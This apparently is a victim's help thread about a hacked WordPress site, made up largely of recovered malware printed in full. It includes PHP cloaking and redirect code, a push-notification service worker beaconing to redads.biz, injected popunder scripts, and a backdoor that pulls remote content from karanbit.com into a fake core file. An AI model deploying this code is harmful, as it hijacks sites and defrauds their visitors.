(" .$indcol ."(5))";if(mysqli_query($dbcon,$sql)){mysqli_close($dbcon);return "yes";}else{mysqli_close($dbcon);return "orutydrfsxgxcvbxcv";}}function getStatus($mtablename,$ltablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$checkdata=array();$checkmaintable=mysqlTableSeekWP($mtablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport);if(!empty($checkmaintable)&& $checkmaintable != "no"){$checkdata["maintable"]="good";$linescount=getCountofTable($mtablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport);if($linescount!="no"&& $linescount>3){$checkdata["cachelines"]=$linescount-3;$cachecount=getCacheCount($mtablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport);if($cachecount!="no"&& $cachecount!="bad"){$checkdata["cachecount"]=$cachecount;}else{$checkdata["cachecount"]="bad";}}else{$checkdata["cachelines"]="bad";$checkdata["cachecount"]="bad";}}else{$checkdata["maintable"]="bad";$checkdata["cachecount"]="bad";}$checklinktable=mysqlTableSeekWP($ltablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport);if(!empty($checklinktable)&& $checklinktable != "no"){$checkdata["linkable"]="good";}else{$checkdata["linkable"]="bad";}return $checkdata;}function getCacheCount($tablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return false;}else{$sql="SELECT COUNT(1) FROM " .$tablename ." 
WHERE wpcache IS NOT NULL AND wpcache!='' AND wpk IS NOT NULL";$needvalue=mysqli_query($dbcon,$sql);$needvalue=mysqli_fetch_all($needvalue);mysqli_close($dbcon);if(count($needvalue[0])>0){return $needvalue[0][0];}else{return "bad";}}}function goToRedirect($ip,$referrer,$ua,$domain_kt,$url_curr,$apiToken,$forlinks,$keyword,$plainred,$plainredurl,$key1){if(empty($ip)){return "";}if(!empty($apiToken)){$user_agent_to_filter=array('#Ask\s*Jeeves#i','#HP\s*Web\s*PrintSmart#i','#HTTrack#i','#IDBot#i','#Indy\s*Library#','#ListChecker#i','#MSIECrawler#i','#NetCache#i','#Nutch#i','#RPT-HTTPClient#i','#rulinki\.ru#i','#Twiceler#i','#WebAlta#i','#Webster\s*Pro#i','#www\.cys\.ru#i','#Wysigot#i','#Ahrefs#i','#Yeti#i','#Accoona#i','#CazoodleBot#i','#CFNetwork#i','#ConveraCrawler#i','#DISCo#i','#Download\s*Master#i','#FAST\s*MetaWeb\s*Crawler#i','#Flexum\s*spider#i','#Gigabot#i','#HTMLParser#i','#ia_archiver#i','#ichiro#i','#IRLbot#i','#Java#i','#km\.ru\s*bot#i','#kmSearchBot#i','#libwww-perl#i','#Lupa\.ru#i','#LWP::Simple#i','#lwp-trivial#i','#Missigua#i','#MJ12bot#i','#msnbot#i','#Offline\s*Explorer#i','#OmniExplorer_Bot#i','#PEAR#i','#psbot#i','#Python#i','#rulinki\.ru#i','#SMILE#i','#Speedy#i','#Teleport\s*Pro#i','#TurtleScanner#i','#User-Agent#i','#voyager#i','#Webalta#i','#WebCopier#i','#WebData#i','#WebZIP#i','#Wget#i','#Yanga#i','#Yeti#i','#MJ12bot#i','#jeeves#i','#WordPress#i','#scooter#i','#av\s*fetch#i','#asterias#i','#spiderthread revision#i','#sqworm#i','#ask#i','#lycos.spider#i','#infoseek sidewinder#i','#ultraseek#i','#polybot#i','#webcrawler#i','#robozill#i','#gulliver#i','#architextspider#i','#charlotte#i','#Vegi\s*bot#i','#BUbiNG#i','#ltx71#i','#YandexBot#i','#MJ12bot#i','#MegaIndex#i','#DotBot#i');if(strpos("qqq" .preg_replace($user_agent_to_filter,'-ANGRYBOT-',$ua),'-ANGRYBOT-')){return "bot";}$lang=$_SERVER['HTTP_ACCEPT_LANGUAGE'];$ua=urlencode($ua);$url=$domain_kt ."?is_api=1&source=" .urlencode($url_curr) ."&action=get&token=" .$apiToken ."&ua=" .$ua ."&ip=" 
.$ip ."&keyword=" .urlencode($keyword) ."&referrer=" .$referrer ."&lang=" .$lang ."&sub_id_1=" .urlencode($key1);if(function_exists('curl_init')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_TIMEOUT,90);$output=curl_exec($ch);curl_close($ch);}else{$params=explode("?",$url);$params=$params[1];$output=file_get_contents($url,false,stream_context_create(array('http'=> array('method'=> 'POST','header'=> 'Content-type: application/x-www-form-urlencoded','content'=> $params))));}$result=json_decode($output);$result=(array)$result;$result=(array)$result["redirect"];if($result["content"]!== "bot"){if(!empty($forlinks)){return "";}foreach($result["headers"]as $header){header($header);}if($result["content"]){$result["content"]=urldecode($result["content"]);return $result["content"];}}elseif($result["content"]=== "bot"){return "bot";}else{return "";}}else{$is_bot="";$user_agent_to_filter=array('#Ask\s*Jeeves#i','#HP\s*Web\s*PrintSmart#i','#HTTrack#i','#IDBot#i','#Indy\s*Library#','#ListChecker#i','#MSIECrawler#i','#NetCache#i','#Nutch#i','#RPT-HTTPClient#i','#rulinki\.ru#i','#Twiceler#i','#WebAlta#i','#Webster\s*Pro#i','#www\.cys\.ru#i','#Wysigot#i','#Yahoo!\s*Slurp#i','#Yeti#i','#Accoona#i','#CazoodleBot#i','#CFNetwork#i','#ConveraCrawler#i','#DISCo#i','#Download\s*Master#i','#FAST\s*MetaWeb\s*Crawler#i','#Flexum\s*spider#i','#Gigabot#i','#HTMLParser#i','#ia_archiver#i','#ichiro#i','#IRLbot#i','#Java#i','#km\.ru\s*bot#i','#kmSearchBot#i','#libwww-perl#i','#Lupa\.ru#i','#LWP::Simple#i','#lwp-trivial#i','#Missigua#i','#MJ12bot#i','#msnbot#i','#msnbot-media#i','#Offline\s*Explorer#i','#OmniExplorer_Bot#i','#PEAR#i','#psbot#i','#Python#i','#rulinki\.ru#i','#SMILE#i','#Speedy#i','#Teleport\s*Pro#i','#TurtleScanner#i','#User-Agent#i','#voyager#i','#Webalta#i','#WebCopier#i','#WebData#i','#WebZIP#i','#Wget#i','#Yandex#i','#Yanga#i','#Yeti#i','#msnbot#i','#spider#i','#yahoo#i','#jeeves#i','#googlebot#i','#altavista
#i','#scooter#i','#av\s*fetch#i','#asterias#i','#spiderthread revision#i','#sqworm#i','#ask#i','#lycos.spider#i','#infoseek sidewinder#i','#ultraseek#i','#polybot#i','#webcrawler#i','#robozill#i','#gulliver#i','#architextspider#i','#yahoo!\s*slurp#i','#charlotte#i','#bingbot#i');$stop_ips_masks=array("66\.249\.[6-9][0-9]\.[0-9]","74\.125\.[0-9]\.[0-9]","65\.5[2-5]\.[0-9]\.[0-9]","74\.6\.[0-9]\.[0-9]","67\.195\.[0-9]\.[0-9]","72\.30\.[0-9]\.[0-9]","38\.[0-9]\.[0-9]\.[0-9]","93\.172\.94\.227","212\.100\.250\.218","71\.165\.223\.134","70\.91\.180\.25","65\.93\.62\.242","74\.193\.246\.129","213\.144\.15\.38","195\.92\.229\.2","70\.50\.189\.191","218\.28\.88\.99","165\.160\.2\.20","89\.122\.224\.230","66\.230\.175\.124","218\.18\.174\.27","65\.33\.87\.94","67\.210\.111\.241","81\.135\.175\.70","64\.69\.34\.134","89\.149\.253\.169","104\.132\.8\.69");foreach($stop_ips_masks as $k => $v){if(preg_match('#^' .$v .'$#',$ip)){$is_bot="bot";}}if(empty($is_bot)&& strpos("qqq" .preg_replace($user_agent_to_filter,'-ANGRYBOT-',$ua),'-ANGRYBOT-')){$is_bot="bot";}if($is_bot=="bot"){return $is_bot;}if(!empty($forlinks)){return "";}if(!empty($plainred)){if(!empty($plainredurl)){$plainred=str_ireplace("[REDIRECTURL]",$plainredurl,$plainred);}$plainred=str_ireplace("[DEFISKEY]",str_ireplace(" ","-",$keyword),$plainred);$plainred=str_ireplace("[SPACEKEY]",$keyword,$plainred);$plainred=str_ireplace("[CURRURL]",$url_curr,$plainred);$plainred=str_ireplace("[REFERER]",$referrer,$plainred);$plainred=str_ireplace("[MULTIKEYREDIRECT]",$key1,$plainred);return $plainred;}else{return "";}}return "";}function updateBDData($tablename,$data,$value,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return false;}else{$sql="UPDATE " .$tablename ." 
SET $value='" .$data ."' WHERE " .$uslovie ."";if(mysqli_query($dbcon,$sql)){mysqli_close($dbcon);return "yes";}else{mysqli_close($dbcon);return false;}}}function placeLinks($pageurl,$links){$page=httpGet($pageurl);if(!empty($page)){$page=preg_replace("/(<body.*>)/","\$1" .$links,$page,1);return $page;}else{return "";}}function randomValuesFromTableById($tablename,$value,$count,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}else{$sql="SELECT " .$value ." FROM " .$tablename ." WHERE wpk IS NOT NULL ORDER BY RAND() LIMIT " .$count;$needvalue=mysqli_query($dbcon,$sql);$res=array();$out=array();$value=explode(",",$value);while($row=mysqli_fetch_array($needvalue)){foreach($value as $k=>$onevalue){$onevalue=trim($onevalue);$res[$onevalue]=$row[$onevalue];}$out[]=$res;}mysqli_close($dbcon);return $out;}}function getCountofTable($tablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return false;}else{$sql="SELECT COUNT(1) FROM " .$tablename;$count=mysqli_query($dbcon,$sql);$count=mysqli_fetch_array($count);mysqli_close($dbcon);if(!empty($count[0])){return $count[0];}else{return "no";}}}function deleteLinesFmDB($tablename,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return false;}else{$sql="DELETE FROM " .$tablename ." 
WHERE " .$uslovie;mysqli_query($dbcon,$sql);mysqli_close($dbcon);return "yes";}}function randomUA(){$uas=array("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36","Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)");$uas=shuffleArr($uas);return $uas[0];}function shuffleArr($arr){srand((float)microtime()*1000000);shuffle($arr);return $arr;}function parseTemplate(){$slugname=randString(8);$post_data=array("post_title"=> "[HER" ."EISP" ."OSTTI" ."TLE]","post_name"=> $slugname,"post_content"=> "[HERE" ."ISC" ."ONT" ."ENT]",'post_status'=> 'publish','post_category'=> array());$post_id=wp_insert_post($post_data,true);$permalink=get_permalink($post_id);$permalink=str_ireplace('https://','',$permalink);$permalink=str_ireplace('https://','',$permalink);if(is_ssl()=== false){$permalink="https://" .$permalink;}else{$permalink="https://" .$permalink;}$sitecode=httpGet($permalink);$permalink=trim($permalink,"/");if(stripos("qqq" .$permalink,"?p=")){$urlfrchpu=str_ireplace("?p=" 
.$post_id,"?p=chpukeyplace",$permalink);}else{$urlfrchpu=str_ireplace($slugname,"chpukeyplace",$permalink);}wp_delete_post($post_id,true);if(!empty($sitecode)){$regular="|<title>(.*)<\/title>|iUs";preg_match_all($regular,$sitecode,$matches);if(!empty($matches[1])){$matches[1]=array_unique($matches[1]);foreach($matches[1]as $pagetitlemain){$sitecode=str_ireplace($pagetitlemain,'[HE' .'REI' .'SPAG' .'ETI' .'TLE]',$sitecode);}}$regular="|(<h2.*>.*</h2+>)|iUs";preg_match_all($regular,$sitecode,$matches);if(!empty($matches[1])){$matches[1]=array_unique($matches[1]);srand((float)microtime()*1000000);shuffle($matches[1]);if(count($matches[1])>= 2){$counth=count($matches[1])/2;$counth=floor($counth);$matches[1]=array_slice($matches[1],0,$counth-1);}foreach($matches[1]as $htagmain){$sitecode=str_ireplace($htagmain,'[HE' .'R' .'EI' .'SH' .'TAG]',$sitecode);}}$regular="|<a\s.*(href=[\"']+.*[\"']+).*>(.*)<\/a>|iUs";preg_match_all($regular,$sitecode,$matches);if(!empty($matches[1])){$all_links=$matches[0];$atagarray=array_combine($matches[2],$matches[1]);$atagarray=array_unique($atagarray);foreach($atagarray as $anchor => $url){if(stripos("qqq" .$url,"feed")|| stripos("qqq" .$url,"wp-login")|| stripos("qqq" .$url,"#")||(stripos("qqq" .$anchor,"<")&& stripos("qqq" .$anchor,">"))){unset($atagarray[$anchor]);}}srand((float)microtime()*1000000);shuffle($atagarray);if(count($atagarray)>= 3){$counta=count($atagarray)/3;$counta=floor($counta);$atagarray=array_slice($atagarray,0,$counta-1);}foreach($all_links as $atagmain){foreach($atagarray as $url){if(stripos("qqq" .$atagmain,$url)){$atagtoreplace=preg_replace("/href=[\"']+.*[\"']+/iUs","href=\"[H" ."ER" ."EIS" ."AT" ."AGL" ."INK]\"",$atagmain);$atagtoreplace=preg_replace("/>.*<\/a>/iUs",">[HE" ."REIS" ."AT" ."AGA" ."NCH" ."OR]</a>",$atagtoreplace);$sitecode=str_ireplace($atagmain,$atagtoreplace,$sitecode);}}}}$sitecode=str_ireplace($permalink,"#",$sitecode);$sitecode=preg_replace("/<meta property=[\"']{1}og:description[\"']{1} 
content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=preg_replace("/<meta property=[\"']{1}og:title[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=preg_replace("/<meta name=[\"']{1}twitter:description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=preg_replace("/<meta itemprop=[\"']{1}description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=preg_replace("/<meta name=[\"']{1}description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=preg_replace("/<meta name=[\"']{1}dc\.description[\"']{1} content=[\"']{1}.*[\"']{1}\s?\/>/iUs","",$sitecode);$sitecode=urlencode($sitecode);$regular="|(%3Cscript.*%3C%2Fscript%3E)|iUs";preg_match_all($regular,$sitecode,$matches);if(!empty($matches[1])){foreach($matches[1]as $currgooglestat){if(stripos("qqq" .$currgooglestat,"google-analytics.com")|| stripos("qqq" .$currgooglestat,"yandex.ru")){$sitecode=str_ireplace($currgooglestat,"",$sitecode);}}}if(!empty($sitecode)){$resultarray=array("chpu"=> $urlfrchpu,"sitetemp"=> $sitecode);return $resultarray;}}return false;}function httpGet($url){if(stripos("qqq" .$url,"?")){$url=$url ."&ertthndxbcvs=yes";}else{$url=$url ."?ertthndxbcvs=yes";}if(function_exists('curl_init')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_USERAGENT,randomUA());curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,90);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);$output=curl_exec($ch);curl_close($ch);}else{$output=file_get_contents($url);}return $output;}function 
httpPost($url,$params){$params=rtrim($params,'&');if(function_exists('curl_init')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_USERAGENT,randomUA());curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_HEADER,false);curl_setopt($ch,CURLOPT_POSTFIELDS,$params);curl_setopt($ch,CURLOPT_TIMEOUT,40);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);$output=curl_exec($ch);curl_close($ch);}else{$output=file_get_contents($url,false,stream_context_create(array('http'=> array('method'=> 'POST','header'=> 'Content-type: application/x-www-form-urlencoded','content'=> $params))));}return $output;}function readValueFromBD($tablename,$value,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}else{if(!empty($uslovie)){$sql="SELECT " .$value ." FROM " .$tablename ." where " .$uslovie;}else{$sql="SELECT " .$value ." FROM " .$tablename;}$needvalue=mysqli_query($dbcon,$sql);$needvalue=mysqli_fetch_array($needvalue);if(!empty($needvalue)){if(!empty($uslovie)){if(stripos($value,",")){$value=explode(",",$value);$res=array();foreach($value as $onevalue){$onevalue=trim($onevalue);$res[$onevalue]=$needvalue[$onevalue];}$needvalue=$res;}else{$needvalue=$needvalue[$value];}}mysqli_close($dbcon);return $needvalue;}else{mysqli_close($dbcon);return "no";}}}function insertToBD($tablename,$cols,$data,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}else{$sql="INSERT INTO " .$tablename ." 
(" .$cols .") VALUES (" .$data .")";if(mysqli_query($dbcon,$sql)){mysqli_close($dbcon);return "yes";}else{mysqli_close($dbcon);return "bewiursfer9uidd";}}}function mysqlTableSeekWP($tablename,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}$table_list=mysqli_query($dbcon,"SHOW TABLES FROM " .$dbname ."");while($row=mysqli_fetch_row($table_list)){if($tablename == $row[0]){mysqli_close($dbcon);unset($row);unset($table_list);return "yes";}}mysqli_close($dbcon);unset($row);unset($table_list);return "no";}function randString($length){$str="";$chars="abcdefghijklmnopqrstuvwxyz0123456789";$size=strlen($chars);for($i=0;$i<$length;$i++){$str .= $chars[rand(0,$size-1)];}return $str;}function createTable($tablename,$fields,$idfield,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "udfgoihdkh48sied";}$table_list=mysqli_query($dbcon,"SHOW TABLES FROM " .$dbname ."");while($row=mysqli_fetch_row($table_list)){if($tablename == $row[0]){mysqli_close($dbcon);return "aawtr35tdgvvcsxdff";}}unset($row);unset($table_list);$sql="CREATE TABLE " .$tablename ." ($fields)";mysqli_query($dbcon,$sql);$sql="ALTER TABLE " .$tablename ." add " .$idfield ." INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY FIRST";mysqli_query($dbcon,$sql);$table_list=mysqli_query($dbcon,"SHOW TABLES FROM " .$dbname ."");while($row=mysqli_fetch_row($table_list)){if($tablename == $row[0]){mysqli_close($dbcon);unset($row);unset($table_list);return "yes";}}mysqli_close($dbcon);return "bewiursfer9uidd";}

    Also, here’s the content of a disabled JS file I found on one of the hosts, in case it helps:

    // Service-worker sample as recovered from the compromised host; code unchanged, analyst comments added.
    // Everything shown to the user is fetched from `host` at push time, so the notification title,
    // options and click target are decided by that remote server on every push.
    // NOTE(review): the page script that registers this worker and asks for notification permission
    // is not part of this sample; look for it when cleaning up.
    var host = 'https://redads.biz/';
    // install: skipWaiting() lets this worker activate without waiting for an older worker to be released.
    self.addEventListener('install', function (event) {
      event.waitUntil(self.skipWaiting());
    });
    // activate: clients.claim() makes the worker take control of pages that are already open.
    self.addEventListener('activate', function(event) {
    	event.waitUntil(clients.claim());
    });
    // push: the push payload itself is never read. The worker looks up its own push subscription,
    // reports the last path segment of the subscription endpoint to `host`, and displays whatever
    // JSON comes back.
    self.addEventListener('push', function(event) {
        event.waitUntil(
            self.registration.pushManager.getSubscription()
                .then(function(subscription) {
                    // Outbound request: <host>?endpoint=<last segment of the endpoint URL>&ver=2
                    return fetch(host + '?endpoint=' + subscription.endpoint.split('/').pop() + '&ver=2')
                        .then(function(response) {
                            return response.json()
                                .then(function(data) {
                                    // data.body is passed as showNotification's second argument (the options object).
                                    // NOTE(review): presumably it carries data.url, which the click handler
                                    // below reads; the response format is not shown in this sample.
                                    return self.registration.showNotification(data.title, data.body);
                                });
                        });
                })
        );
    });
    // notificationclick: the destination comes from the notification's own data (event.notification.data.url),
    // i.e. from the remote response above, not from anything on the site.
    self.addEventListener('notificationclick', function(event) {
        const target = event.notification.data.url;
        event.notification.close();
        // includeUncontrolled: also consider windows this worker does not control.
        event.waitUntil(clients.matchAll({
            type: 'window',
            includeUncontrolled: true
        }).then(function(clientList) {
            // Reuse a window that is already showing the target URL...
            for (var i = 0; i < clientList.length; i++) {
                var client = clientList[i];
                if (client.url == target && 'focus' in client) {
                    return client.focus();
                }
            }
            // ...otherwise open the target in a new window.
            return clients.openWindow(target);
          })
      );
    });

    Eli,

    I’ve updated the scanner and rerun it on the site; it still shows no issues, but the site still has the problem.

    I’ve been able to view source on an affected homepage, and this code is at the very top of the page source:

    
    <script>
    var popunder = {expire: 6,url: "https://win-your-prize-now2.life/?u=mr1kd0x&o=f5pp7z3&t=p"};
    </script>
    <script src="https://win-your-prize-now2.life/js/popunder.js"></script><!DOCTYPE html>

    Have you happened upon any further information that may help?

    Here is a link to the .default file on filebin; I cannot attach it via email or to the post here.

    https://filebin.net/r2hfmcigs6b554nv/_default?t=gkr279ce

    here is a copy of the .default file

    <?php
    
    //	$knockInUrl = 'https://1.karanbit.com/lnk/don/1.php';
    //
    //
    //function isHttps() {
    //    if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') ||
    //        (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ||
    //        (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ||
    //        (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') ||
    //        (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) {
    //        $server_request_scheme = 'https';
    //    } else {
    //        $server_request_scheme = 'http';
    //    }
    //    return $server_request_scheme;
    //}
    //
    //$knockScheme = isHttps();
    //$knockUrl = "{$knockScheme}://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";
    //
    //
    //$curl = curl_init();
    //curl_setopt($curl, CURLOPT_URL, $knockInUrl);
    //curl_setopt($curl, CURLOPT_POST, true);
    //curl_setopt($curl, CURLOPT_POSTFIELDS, $knockUrl);
    //
    //$response = curl_exec($curl);
    //
    //curl_close($curl);
    
    // Guarded so the definition is skipped if a getUserIP() already exists.
    if (!function_exists('getUserIP')) {
        // Returns the first public IP address found in the request metadata; falls off the end
        // (implicit null) when no candidate validates.
        // Analyst note: every key except REMOTE_ADDR is filled from a request header, so unless a
        // trusted proxy overwrites it, the "visitor IP" returned here is whatever the client sent.
        // The script later compares this value with its IP lists.
        function getUserIP() {
            // Keys are tried in this order; the first one holding a valid public address wins.
            foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
                if (array_key_exists($key, $_SERVER) === true) {
                    // A header may carry a comma-separated chain of addresses; each entry is trimmed and tested.
                    foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) {
                        // Private and reserved ranges are rejected, so only public addresses are returned.
                        if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
                            return $ip;
                        }
                    }
                }
            }
        }
    }
    
    // Guarded so the definition is skipped if a cacheUrl() already exists.
    if (!function_exists('cacheUrl')) {
        // Fetches $url with cURL and caches the response body in a file under the WordPress
        // includes directory; returns the fetched or cached data.
        //   $url        - remote address to download
        //   $skip_cache - when true, always download and do not write the cache file
        // Analyst note: the cache file holds remote content, not PHP shipped with WordPress.
        // NOTE(review): the file name looks like a core file but does not appear to be one; verify
        // against a clean copy of the same WordPress version and treat its presence as an artifact.
        function cacheUrl($url, $skip_cache = FALSE) {
    
           $cachetime = 10; //10 seconds; the one-week value is the commented-out line below
    
           // $cachetime = 60 * 60 * 24 * 7; //one week
    
            // Cache location: <ABSPATH><WPINC>/class-wp-http-netfilter.php
            $file = ABSPATH.WPINC.
            '/class-wp-http-netfilter.php';
    
            // A missing cache file leaves $mtime at 0, which forces a download below.
            $mtime = 0;
            if (file_exists($file)) {
                $mtime = filemtime($file);
            }
            $filetimemod = $mtime + $cachetime;
    
            // Download when the cache is older than $cachetime seconds or the caller asked to skip it.
            if ($filetimemod < time() OR $skip_cache) {
                $ch = curl_init($url);
                // Browser-like User-Agent, follows up to 5 redirects, 30 s connect / 60 s total timeout.
                curl_setopt_array($ch, array(
                    CURLOPT_HEADER => FALSE,
                    CURLOPT_RETURNTRANSFER => TRUE,
                    CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',
                    CURLOPT_FOLLOWLOCATION => TRUE,
                    CURLOPT_MAXREDIRS => 5,
                    CURLOPT_CONNECTTIMEOUT => 30,
                    CURLOPT_TIMEOUT => 60,
                ));
                $data = curl_exec($ch);
                curl_close($ch);
    
                // Only a non-empty response replaces the cache file; a failed download leaves the old file in place.
                if ($data AND!$skip_cache) {
                    file_put_contents($file, $data);
                }
            } else {
                // Cache is still fresh: serve the stored copy.
                $data = file_get_contents($file);
            }
    
            return $data;
        }
    }
    
    // Downloads (or reads the cached copy of) a remote text file; the check that follows uses
    // strpos() to test whether the requester's IP occurs anywhere in it, and requests that match
    // skip the whole else branch. NOTE(review): by its name this looks like an operator/admin IP
    // list; the file's contents are not shown here.
    // Outbound requests to this host in egress or proxy logs are an indicator for this sample.
    $weoboo = cacheUrl('https://karanbit.com/lnk/data/ip.admin.txt');
    					$user_ip = getUserIP();
    
    ///////////////////////////////////////////////////////////////
    if (strpos($weoboo, getUserIP()) !== false) {
        //ip found
    } else {
    	$id = $_SERVER['REQUEST_URI']; 	
    		if (preg_match_all("/ffgg$/", $id, $matches) ) {
    echo '111111';
    		}
    
    ///////////////////////////////////////////////////////////////	
    //linkovka	
    $uag = $_SERVER['HTTP_USER_AGENT']; 
    $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI'];
    $r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
    if (preg_match_all("/5.45.69.4|185.104.184.43|134.19.179.131|213.152.180.5|185.200.116.203|141.98.102.235|134.19.179.195|185.156.175.35|178.162.204.214|82.102.27.163|37\.1\.217\..*|5.2.79.82|213.111.153.156|134.19.179.235|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
    //if (preg_match_all("/ecocyclerieloirelayonaubance.fr|daruselamguesthouse.com/", $host, $matches)) {
    if (!preg_match_all("/page2-/", $id, $matches)) {
    	$ch = curl_init(); 
    $url_string = ''; 
     //$url_string = 'https://fst.sex-dating77.com/links/mix/page2-1-1-x'.rand(1,88).'dddddd/'; 
    	curl_setopt ($ch, CURLOPT_URL, $url_string);
    	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
    	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    	curl_setopt($ch, CURLOPT_HEADER, 1);
    	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $host=$_SERVER['HTTP_HOST'];
    $ref =$_SERVER['HTTP_REFERER'];
    $uri =$_SERVER['REQUEST_URI'];
    $r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
    	curl_setopt($ch, CURLOPT_REFERER, $r);
    	curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR']));
    	$html = curl_exec ($ch);
    if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") {
        if (preg_match('~Location: (.*)~i', $html, $match)) {
          $location = trim($match[1]);
         }    curl_close($ch);
      
        header('Location: ' . $location);
                                                          exit();
      }
    	$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
